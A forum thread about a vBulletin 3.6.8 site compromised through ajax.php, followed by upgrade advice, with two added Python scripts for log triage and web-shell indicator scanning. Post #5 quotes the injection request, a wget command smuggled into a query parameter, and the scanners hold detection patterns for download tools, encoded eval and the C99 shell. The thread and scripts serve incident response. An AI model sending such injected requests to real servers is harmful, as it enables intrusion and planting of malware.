Questions regarding security/malware

  • z0diac
    Senior Member
    • Oct 2006
    • 444

    Questions regarding security/malware

    I'm running vb 3.6.8 (amongst 2 other versions on other sites). Recently I've had BAD problems with malware being installed through what seems to be ajax.php.

    What is the latest version of vBulletin?

    It seems the more I search into malware + vBulletin, the further one goes up in versions, the even MORE malware-susceptible vB becomes! The more I research, it seems vB 4 is full of exploits. Usually it's blamed on 3rd party plugins, but in the last post I read, the guy was running stock vB and still got infected.

    Question: What is the latest version of vB, and has ANYONE suffered an exploit attack on it?

    I'm looking for a version I just do NOT have to worry about, waking up and seeing that Google has flagged my site as an Attack Site! in the big box.
  • Dustin L.
    Senior Member
    • Mar 2011
    • 639
    • 4.2.X

    #2
    4.2.0 PL2 is the latest version. It's not always vB that has an exploit; oftentimes it's a misconfigured server or a plugin.

    Dustin
    http://quikmsg.net/strtoupper/ - Convert lowercase text and code to all uppercase!
    http://quikmsg.net/strtolower/ - Convert uppercase text and code to all lowercase!


    • z0diac
      Senior Member
      • Oct 2006
      • 444

      #3
      Originally posted by Dustin L.
      4.2.0 PL2 is the latest version. It's not always vB that has an exploit; oftentimes it's a misconfigured server or a plugin.

      I'm just scared I'll upgrade and run into exactly the same problem I'm having right now. On a huge server with hundreds of gigabytes of files and over a MILLION files, it's absolutely sickening (physically sick to my stomach) to wake up and check the site and see the big Google warning ATTACK SITE! box for Firefox users, and not know what's happened or what's been changed, etc. And the worst part is, I haven't eaten in days because this is worrying me 24/7. I can't sleep, I can't eat, my hands and fingers are ALWAYS sweating. It's having an enormous emotional and physical impact on me knowing my site is being broken into.


      • Dustin L.
        Senior Member
        • Mar 2011
        • 639
        • 4.2.X

        #4
        If you're having health issues because you're scared of people getting into your site, you might want to see a doctor.

        Then, read these:

        Dustin


        • z0diac
          Senior Member
          • Oct 2006
          • 444

          #5
          Thanks Dustin L.

          SPECIFICALLY: I need a version of at least the ajax.php file that is compatible with 3.6.8 -- right now I have a 4.x version that DOES patch the security hole, but unfortunately does not let users register.

          I really need a patched ajax.php file. The old 3.6.8 ajax.php allowed people to put files onto my site like this:
          Code:
          http://forum.mydomain.com/ajax.php?global=wget%20http://www.whatever.com/images/logo2.png
          Code:
          Database error in vBulletin 3.6.8:

          Invalid SQL:
          SELECT languageid,
                 phrasegroup_posting AS phrasegroup_posting,
                 phrasegroup_search AS phrasegroup_search,
                 phrasegroup_socialgroups AS phrasegroup_socialgroups,
                 phrasegroup_global AS phrasegroup_global,
                 options AS lang_options,
                 languagecode AS lang_code,
                 charset AS lang_charset,
                 locale AS lang_locale,
                 imagesoverride AS lang_imagesoverride,
                 dateoverride AS lang_dateoverride,
                 timeoverride AS lang_timeoverride,
                 registereddateoverride AS lang_registereddateoverride,
                 calformat1override AS lang_calformat1override,
                 calformat2override AS lang_calformat2override,
                 logdateoverride AS lang_logdateoverride,
                 decimalsep AS lang_decimalsep,
                 thousandsep AS lang_thousandsep
          FROM language
          WHERE languageid = 1;

          MySQL Error  : Unknown column 'phrasegroup_socialgroups' in 'field list'
          Error Number : 1054
          Date         : Thursday, July 19th 2012 @ 03:34:25 AM
          Script       : http://forum.mydomain.com/ajax.php?do=imagereg&imagehash=95fb5293802fe6f57d2923e692673ea9
          Referrer     : http://forum.mydomain.com/register.php?do=register
          IP Address   : 1.38.16.7
          Username     : 
          Classname    : vB_Database


          • borbole
            Senior Member
            • Feb 2010
            • 3074
            • 4.0.0

            #6
            The db error you posted comes from the column 'phrasegroup_socialgroups', which seems to be missing. If you are reluctant to upgrade your forum to 4.2.0 pl2 then upgrade your forum to at least the latest version of the 3.8x series. That would take care of fixing the security issues.

            Personally I would advise you, if I may, to upgrade to 4.2.0 pl2. It has no known security issue and it has a lot of great options and features. Also make a thorough search of your server space for any backdoor scripts that may have been left behind, and also contact your host and ask them to check their access logs to see how exactly your forum was hacked.


            • z0diac
              Senior Member
              • Oct 2006
              • 444

              #7
              I take the last msg back! It looks like new user registrations ARE working - all those errors came from the SAME IP ADDRESSES! I got about 9 registration errors but ONLY from these 2 IPs! Hacker!!??

              IP Address : 1.38.16.5

              and

              IP Address : 1.38.16.7


              ----

              I checked the user base and there HAVE been successful new registrations today (IPs way different from the ones above). All my 9 vBulletin Database Error msgs were like the one I posted above, and ALL from those 2 IP addresses. So maybe it was an attempt to exploit the registration process.

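Added example, not code from the thread, from vBulletin or from the poster's host: a log-triage script that applies the two checks raised in posts #5 and #7 to web-server access logs, flagging ajax.php requests whose `global` parameter carries a download command and counting server errors on the registration image step per client IP. The log lines are constructed in Apache combined format with documentation-range addresses; the field layout and the assumption that the quoted database error surfaced as an HTTP 500 are mine.

```python
import re
from collections import Counter, defaultdict
from urllib.parse import parse_qs, urlsplit

# Constructed sample lines in Apache combined format (documentation-range IPs, not the thread's).
SAMPLE_LOG = """\
198.51.100.7 - - [19/Jul/2012:03:30:02 +0000] "GET /ajax.php?global=wget%20http://www.whatever.com/images/logo2.png HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.7 - - [19/Jul/2012:03:34:25 +0000] "GET /ajax.php?do=imagereg&imagehash=0123456789abcdef0123456789abcdef HTTP/1.1" 500 0 "http://forum.mydomain.com/register.php?do=register" "Mozilla/5.0"
198.51.100.5 - - [19/Jul/2012:03:35:10 +0000] "GET /ajax.php?do=imagereg&imagehash=fedcba9876543210fedcba9876543210 HTTP/1.1" 500 0 "http://forum.mydomain.com/register.php?do=register" "Mozilla/5.0"
203.0.113.9 - - [19/Jul/2012:03:36:40 +0000] "GET /ajax.php?do=imagereg&imagehash=00112233445566778899aabbccddeeff HTTP/1.1" 200 1024 "http://forum.mydomain.com/register.php?do=register" "Mozilla/5.0"
203.0.113.9 - - [19/Jul/2012:03:37:01 +0000] "GET /showthread.php?t=1 HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')
# Download tools that have no business in a query-string value handed to a forum script.
FETCH_RE = re.compile(r'\b(wget|curl|fetch|lynx)\b', re.I)

def parse_line(line):
    """Parse one combined-format line into ip, path, decoded query dict and status (None if unparseable)."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    query = {k: v[0] for k, v in parse_qs(parts.query, keep_blank_values=True).items()}
    return {"ip": m.group("ip"), "path": parts.path, "query": query, "status": int(m.group("status"))}

def classify(rec):
    """Label one ajax.php request; None when it looks benign."""
    if not rec["path"].endswith("/ajax.php"):
        return None
    q = rec["query"]
    # ajax.php is driven by 'do'; a 'global' value naming a fetch tool is the abuse the thread describes.
    if "global" in q and FETCH_RE.search(q["global"]):
        return "fetch-command-in-global-param"
    # A 5xx on the registration image step is the "Database error" the thread shows (assumed 500 status).
    if q.get("do") == "imagereg" and rec["status"] >= 500:
        return "imagereg-server-error"
    return None

def scan(log_text):
    """Group findings by client IP so a burst from one or two sources stands out."""
    per_ip = defaultdict(Counter)
    for line in log_text.splitlines():
        rec = parse_line(line)
        label = classify(rec) if rec else None
        if label:
            per_ip[rec["ip"]][label] += 1
    return {ip: dict(counts) for ip, counts in per_ip.items()}
```

On the sample, the two 198.51.100.x sources carry every finding while the normal registrant at 203.0.113.9 produces none, which is the pattern post #7 describes.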

              • Mark.B
                vBulletin Support
                • Feb 2004
                • 24287
                • 6.0.X

                #8
                3.8.7 or 4.2.0 are the two latest versions.

                Neither have any known security issues.

                If you have a site that uses modifications or custom styles, then for the time being upgrade to 3.8.7.

                But it is possible it's a server exploit, in which case upgrading will not help.

                Don't try to use files from later versions in 3.6.8. It will only cause problems and even potentially data loss.
                MARK.B
                vBulletin Support
                ------------
                My Unofficial vBulletin 6.0.0 Demo: https://www.talknewsuk.com
                My Unofficial vBulletin Cloud Demo: https://www.adminammo.com


                • borbole
                  Senior Member
                  • Feb 2010
                  • 3074
                  • 4.0.0

                  #9
                  Those IPs come from India. Most probably spammers.


                  • z0diac
                    Senior Member
                    • Oct 2006
                    • 444

                    #10
                    Originally posted by borbole
                    The db error you posted comes from the column 'phrasegroup_socialgroups', which seems to be missing. If you are reluctant to upgrade your forum to 4.2.0 pl2 then upgrade your forum to at least the latest version of the 3.8x series. That would take care of fixing the security issues.

                    Personally I would advise you, if I may, to upgrade to 4.2.0 pl2. It has no known security issue and it has a lot of great options and features. Also make a thorough search of your server space for any backdoor scripts that may have been left behind, and also contact your host and ask them to check their access logs to see how exactly your forum was hacked.
                    Actually I have the guys at Total Server Solutions on the problem and they've been on it for a few days now, upgrading/patching Plesk, php/mysql/apache, they've run scanners, grepped for iframes, that '64' (?) encoded stuff, etc. It wasn't until last night that they found an __error.php file that was the !C99madShell v. 2.0 madnet edition! hack program thing, and they managed to determine that my ajax.php file (3.6.8) had a major security hole in it that allowed intruders to put files onto my server. So as a quick fix I found an open source ajax 4.x file and tried it simply because that was the only option we could think of, they tried the same exploit on it, and the exploit failed. So I *SEEM* to be 'safe' right now, as there was no malware put on overnight, but that's not a large time frame, so time will tell. But obviously using the wrong version ajax.php with my version of vB isn't the right way to do things. But it's better than having malware slapped all over, and waking up to big red boxes saying "Warning: Attack Site!" when I try to access my site.

                    What I REALLY need right now is a fully patched ajax.php for 3.6.8 until my coder can make my forum ready for upgrade. I will buy 4.x if 3.6.8 can be upgraded to it. But due to the large amount of custom work on my forum by somewhat amateur people in the past, my current coder needs to re-do their work so the plugins work as hooks instead of manually editing vB php code (the latter, of course, would all be overwritten and lost during an upgrade).

                    - - - Updated - - -

                    Originally posted by Mark.B
                    3.8.7 or 4.2.0 are the two latest versions.

                    Neither have any known security issues.

                    If you have a site that uses modifications or custom styles, then for the time being upgrade to 3.8.7.

                    But it is possible it's a server exploit, in which case upgrading will not help.

                    Don't try to use files from later versions in 3.6.8. It will only cause problems and even potentially data loss.
                    So 3.8.7 then. ok. I'll see if I can get my coder to make proper hook plugins for the sloppy custom work that was done before he started working with me, and get him to upgrade for me. THANK YOU on stating what version I need to get to, because I have no idea about vB version numbers.

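Added example, not the thread's, vBulletin's or the hosting company's tooling: a scanner for the indicators the server team grepped for in post #10 (eval of base64-encoded blobs, hidden iframes, the C99madShell banner, and odd file names such as __error.php), run either over a directory tree or over constructed sample contents. The file-name rules, the 200-character blob threshold and the sample files are assumptions of mine.

```python
import os
import re

# Indicator patterns; each is a triage hint for a human to confirm, not a verdict (minified JS has long blobs too).
INDICATORS = {
    "eval-of-encoded-blob": re.compile(r'eval\s*\(\s*(base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(', re.I),
    "long-base64-blob": re.compile(r'[A-Za-z0-9+/]{200,}={0,2}'),
    "hidden-iframe": re.compile(r'<iframe\b[^>]*\b(width|height)\s*=\s*["\']?0\b', re.I),
    "c99-shell-banner": re.compile(r'c99\s*(mad)?shell', re.I),
}
# Assumed name rules: double-underscore PHP files such as __error.php, and PHP hidden behind an image/text extension.
ODD_NAME = re.compile(r'(^|/)__[^/]*\.php$|\.php\.(txt|jpe?g|png|gif)$', re.I)

def scan_text(relpath, content):
    """Return the indicator names that fire for one file's path and contents."""
    hits = [name for name, rx in INDICATORS.items() if rx.search(content)]
    if ODD_NAME.search(relpath):
        hits.append("suspicious-file-name")
    return hits

def scan_tree(root):
    """Walk a web root and return {relative path: [indicators]} for every file that fires."""
    findings = {}
    for dirpath, _, files in os.walk(root):
        for fname in files:
            if not (fname.lower().endswith((".php", ".html", ".htm", ".js")) or ODD_NAME.search(fname)):
                continue
            full = os.path.join(dirpath, fname)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            with open(full, encoding="utf-8", errors="replace") as fh:
                hits = scan_text(rel, fh.read())
            if hits:
                findings[rel] = hits
    return findings

# Constructed samples standing in for files on the server; the blob decodes to harmless "ABCABC..." text.
SAMPLE_FILES = {
    "forum/__error.php": "<?php /* C99madShell v. 2.0 madnet edition */ eval(base64_decode('" + "QUJD" * 60 + "')); ?>",
    "forum/images/logo2.php.png": "<?php echo 'placeholder'; ?>",
    "forum/index.php": "<?php require_once('./global.php'); echo 'hello'; ?>",
    "forum/footer.html": '<div><iframe src="http://example.invalid/x" width=0 height=0></iframe></div>',
}

def scan_samples():
    """Run scan_text over the constructed samples, keeping only files that fire."""
    return {p: scan_text(p, c) for p, c in SAMPLE_FILES.items() if scan_text(p, c)}
```

Pair the hits with a file-date and hash comparison against a clean vBulletin download of the same version; a renamed or re-dated stock file is as telling as a signature match.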

                    • Mark.B
                      vBulletin Support
                      • Feb 2004
                      • 24287
                      • 6.0.X

                      #11
                      Originally posted by z0diac

                      Actually I have the guys at Total Server Solutions on the problem and they've been on it for a few days now, upgrading/patching Plesk, php/mysql/apache, they've run scanners, grepped for iframes, that '64' (?) encoded stuff, etc. It wasn't until last night that they found an __error.php file that was the !C99madShell v. 2.0 madnet edition! hack program thing, and they managed to determine that my ajax.php file (3.6.8) had a major security hole in it that allowed intruders to put files onto my server. So as a quick fix I found an open source ajax 4.x file and tried it simply because that was the only option we could think of, they tried the same exploit on it, and the exploit failed. So I *SEEM* to be 'safe' right now, as there was no malware put on overnight, but that's not a large time frame, so time will tell. But obviously using the wrong version ajax.php with my version of vB isn't the right way to do things. But it's better than having malware slapped all over, and waking up to big red boxes saying "Warning: Attack Site!" when I try to access my site.

                      What I REALLY need right now is a fully patched ajax.php for 3.6.8 until my coder can make my forum ready for upgrade. I will buy 4.x if 3.6.8 can be upgraded to it. But due to the large amount of custom work on my forum by somewhat amateur people in the past, my current coder needs to re-do their work so the plugins work as hooks instead of manually editing vB php code (the latter, of course, would all be overwritten and lost during an upgrade).
                      There is not going to be a patched version of any 3.6.8 files. Your best bet I think is to upgrade to 3.8.7.
                      MARK.B
                      vBulletin Support


                      • z0diac
                        Senior Member
                        • Oct 2006
                        • 444

                        #12
                        With the help of my coder, we've decided to go ahead and upgrade. I just have to pay him goobs of dollars first to write proper plugins for the ones I got amateurs to do when I first started. Then set up the new version side by side, but offline, make sure all the plugins and modifications work, and go from there.

                        But so far this 4.x ajax.php script seems to be holding everything down ok. Knock on wood... I'm about to go to sleep and with my luck I'll wake up to the big Google red box of death.
